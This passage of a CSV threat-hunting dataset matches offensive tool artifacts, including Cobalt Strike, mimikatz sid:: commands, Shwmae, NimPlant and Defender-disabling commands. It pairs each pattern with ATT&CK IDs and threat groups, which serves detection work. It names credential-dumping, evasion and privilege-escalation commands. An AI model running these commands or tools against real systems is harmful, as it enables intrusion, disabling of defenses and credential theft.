Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59385" "*Shhmon.csproj*",".{0,1000}Shhmon\.csproj.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59386" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59387" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59388" "*Shhmon.git*",".{0,1000}Shhmon\.git.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59389" "*SHIM me what you got - Manipulating Shim and Office for Code Injection*",".{0,1000}SHIM\sme\swhat\syou\sgot\s\-\sManipulating\sShim\sand\sOffice\sfor\sCode\sInjection.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","59390" "*shinject 
*",".{0,1000}shinject\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59391" "*shinject.nim*",".{0,1000}shinject\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59392" "*shinject_ex *",".{0,1000}shinject_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59393" "*shit.fuck.org*",".{0,1000}shit\.fuck\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","59394" "*shmilylty/cheetah*",".{0,1000}shmilylty\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","59395" "*shocknawe.py*",".{0,1000}shocknawe\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","59396" "*Shodan.io*",".{0,1000}Shodan\.io.{0,1000}","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Reconnaissance","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59397" "*shodanp.py*",".{0,1000}shodanp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","59398" "*Shoggoth doesn't support x86 PE 
yet*",".{0,1000}Shoggoth\sdoesn\'t\ssupport\sx86\sPE\syet.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","59399" "*ShoggothPolyEngine(*",".{0,1000}ShoggothPolyEngine\(.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","59400" "*ShorSec/DavRelayUp*",".{0,1000}ShorSec\/DavRelayUp.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","59401" "*ShorSec/DllNotificationInjection*",".{0,1000}ShorSec\/DllNotificationInjection.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","59402" "*ShorSec/ShadowSpray*",".{0,1000}ShorSec\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black 
Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","59403" "*Show-BallonTip.ps1*",".{0,1000}Show\-BallonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59404" "*Show-BalloonTip.ps1*",".{0,1000}Show\-BalloonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59405" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","59406" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","59407" "*-ShowWindowMode:Hide sc stop WinDefend*",".{0,1000}\-ShowWindowMode\:Hide\ssc\sstop\sWinDefend.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","59408" "*Show-WMImplantMainMenu*",".{0,1000}Show\-WMImplantMainMenu.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","59409" "*shspawn x64 *",".{0,1000}shspawn\sx64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59421" "*shspawn x86 *",".{0,1000}shspawn\sx86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59422" "*shucknt.php*",".{0,1000}shucknt\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise 
use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","59423" "*ShuckNT-main*",".{0,1000}ShuckNT\-main.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","59424" "*ShutdownRepo/pywhisker*",".{0,1000}ShutdownRepo\/pywhisker.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","59425" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59426" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59427" "*Shwmae dump *",".{0,1000}Shwmae\sdump\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59428" "*Shwmae enum *",".{0,1000}Shwmae\senum\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59429" "*Shwmae prt *",".{0,1000}Shwmae\sprt\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59430" "*Shwmae prt *",".{0,1000}Shwmae\sprt\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59431" "*Shwmae sign *",".{0,1000}Shwmae\ssign\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59432" "*Shwmae webauthn *",".{0,1000}Shwmae\swebauthn\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59433" "*Shwmae webauthn*",".{0,1000}Shwmae\swebauthn.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59434" "*Shwmae.exe sign*",".{0,1000}Shwmae\.exe\ssign.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59435" "*sid::clear*",".{0,1000}sid\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59436" "*sid::lookup*",".{0,1000}sid\:\:lookup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59437" "*sid::modify*",".{0,1000}sid\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59438" "*sid::patch*",".{0,1000}sid\:\:patch.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59439" "*sigflip*/Bof/*",".{0,1000}sigflip.{0,1000}\/Bof\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
